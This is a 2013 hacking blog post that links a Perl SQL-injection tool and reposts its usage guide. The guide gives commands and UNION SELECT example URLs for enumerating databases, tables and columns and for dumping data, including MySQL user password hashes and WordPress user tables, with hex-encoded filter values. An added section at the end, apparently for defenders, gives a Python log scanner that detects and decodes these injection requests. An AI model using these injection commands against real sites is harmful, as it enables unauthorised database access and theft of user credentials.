Saturday, April 13, 2013

TUT hack shop ver 4

First, download this tool (written in Perl):
http://pacenoge.org/tool/ssdp51.tar.gz
Supporting software:
http://www.perl.org/get.html
The instructions are included in the ssdp51.tar.gz file itself, but I'm posting them here anyway to make the post a bit longer.

Quote:
[INPUT]
-u [SQLi URL] target with id parameter or sqli url with c0li string
-e [sqli end tag] sql injection end tag (default: "--")
-d [database name] this option should not be used (default: @@database)
-t [table name] table_name
-c [columns name] column_name (example: id,user,pass,email)
-s [space code] SPACE code: +,/**/,%20 (default: "+")
-f [max field] max field to get magic number (default: 123)
-start [num] row number to begin dumping data
-stop [num] row number to stop dumping
-log [file name] file name to save ssdp data (default: ssdp.log)
-p [http proxy] hostname:port

[COMMAND]
-info Get MySQL Information [MySQL v4+]
-dbase Concat Databases [MySQL v5+]
-table Concat Tables [MySQL v5+]
-column Concat Columns [MySQL v5+]
-tabcol Concat Tables with Columns [MySQL v5+]
-find Search Columns Name [MySQL v5+]
-magic Find Magic Number [MySQL v4+]
-dump Dump Data [MySQL v4+]
-brute Fuzzing Tables & Columns [MySQL v4+]

--------------------------------------------------------------------------
Note:
[+] [COMMAND] should be in last position.
[+] -d [dbname] is not needed if the tables, columns or data you want to extract
is in the current database (@@database).

1. Find Magic Number / Null Column "-magic"
Required Options: -u
Optional: -s, -f, -e, -log, -p
Command: perl ssdp.pl -u [URL] [options] -magic
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=1" -magic
2) perl ssdp.pl -u "http://localhost/index.php?id=null" -s "/**/" -f 100 -e "/*" -p 127.0.0.1:8080 -magic

2. Gathering MySQL Information "-info"
Required Options: -u
Optional: -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -info
Example: perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info

3. Concat Databases
Required Options: -u
Optional: -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -dbase
Example: perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -dbase

4. Concat Tables
Required Options: -u
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -table
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -table
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -table

5. Concat Columns
Required Options: -u, -t
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -t wp_users -column
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -t wp_users -column

6. Concat Tables with Columns "-tabcol"
Required Options: -u
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -tabcol
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -tabcol
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -tabcol

7. Dump Data "-dump"
Required Options: -u, -t, -c
Optional: -d, -start, -stop, -where, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -c [colname] -start [num] -stop [num] -dump
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mysql -t user -c password -dump
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mysql -t user -c host,user,password -start 5 -stop 10 -dump

8. Special Dump Query "-where [query] -dump"
Required Options: -u, -t, -c
Optional: -d, -e, -log, -p
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -c [colname] -where [query] -dump
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "id=1" -dump
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "user=0x61646D696E" -dump
3) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "email like (0x257961686F6F25)" -dump

Information: [+] string values should be converted to hexadecimal ASCII or decimal ASCII before use (http://okedeh.co.tv)
[+] 0x61646D696E = "admin", 0x257961686F6F25 = "%yahoo%", char(99,48,108,105)
[+] Example MySQL Query: [-] select id,user,pass,email from mydb.user where user='admin';
[-] select id,user,pass,email from mydb.user where email like '%yahoo%';

9. Brute Tables & Columns "-brute"
Command: perl ssdp.pl -u [SQLi URL] -brute
Example: [+] perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -brute

10. Combine [COMMAND]
Command: perl ssdp.pl -u [SQLi URL] -[options]
Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info -dbase -table
2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info -dbase -tabcol

11. Still thinking on this one :/
And here is the video made by not_higgle over at DF:
Quote:
http://hotfile.com/dl/43823298/c827076/phpver4.rar.html
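
A defender's view of the request shapes shown in the usage examples above, as an added example that is not part of the original post or of the tool: a Python access-log scanner that undoes the space substitutes listed under -s and decodes the hex and char() strings described under -where. The log lines are constructed, the function names and finding labels are assumptions, and the patterns rely only on the URL shapes documented on this page, since the requests the tool actually sends are not shown.

```python
import re
from urllib.parse import unquote_plus

INLINE_COMMENT = re.compile(r"/\*.*?\*/")  # /**/ used in place of a space
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){3,})\b", re.I)
CHAR_CALL = re.compile(r"\bchar\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(url):
    """Undo the space substitutes listed under -s: +, %20 and /**/."""
    text = INLINE_COMMENT.sub(" ", unquote_plus(url))
    return re.sub(r"\s+", " ", text)

def decoded_strings(text):
    """Recover strings hidden as 0x... hex or char(n,n,...) decimal ASCII."""
    out = [bytes.fromhex(m.group(1)).decode("latin-1")
           for m in HEX_LITERAL.finditer(text)]
    out += ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in CHAR_CALL.finditer(text)]
    return [s for s in out if s.isprintable()]

def classify(url):
    """Return the findings for one request URL (empty list if clean)."""
    text = normalise(url)
    strings = decoded_strings(text)
    findings = ["union-select"] if UNION_SELECT.search(text) else []
    if re.search(r"\bc0li\b", text, re.I) or "c0li" in strings:
        findings.append("c0li-marker")
    findings += ["encoded-string:" + s for s in strings]
    return findings

def scan(lines):
    """Return (client, findings) for each log line that has a finding."""
    matches = (REQUEST.match(line) for line in lines)
    hits = [(m.group(1), classify(m.group(2))) for m in matches if m]
    return [h for h in hits if h[1]]

# Constructed access-log lines (not real traffic), shaped like the page's examples.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2013:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [13/Apr/2013:10:00:02 +0000] "GET /index.php?id=-1+union+select+1,2,c0li,4,5 HTTP/1.1" 200 498',
    '203.0.113.7 - - [13/Apr/2013:10:00:03 +0000] "GET /index.php?id=-1/**/UNION/**/SELECT/**/1,char(99,48,108,105),3/* HTTP/1.1" 200 498',
    '203.0.113.7 - - [13/Apr/2013:10:00:04 +0000] "GET /index.php?id=-1%20union%20select%201,2,3%20from%20mydb.user%20where%20user=0x61646D696E-- HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for client, found in scan(SAMPLE_LOG):
        print(client, found)
```

Matching on the normalised text rather than the raw URL is what makes the three space encodings equivalent, and decoding the literals shows the analyst which string a `where` filter was targeting.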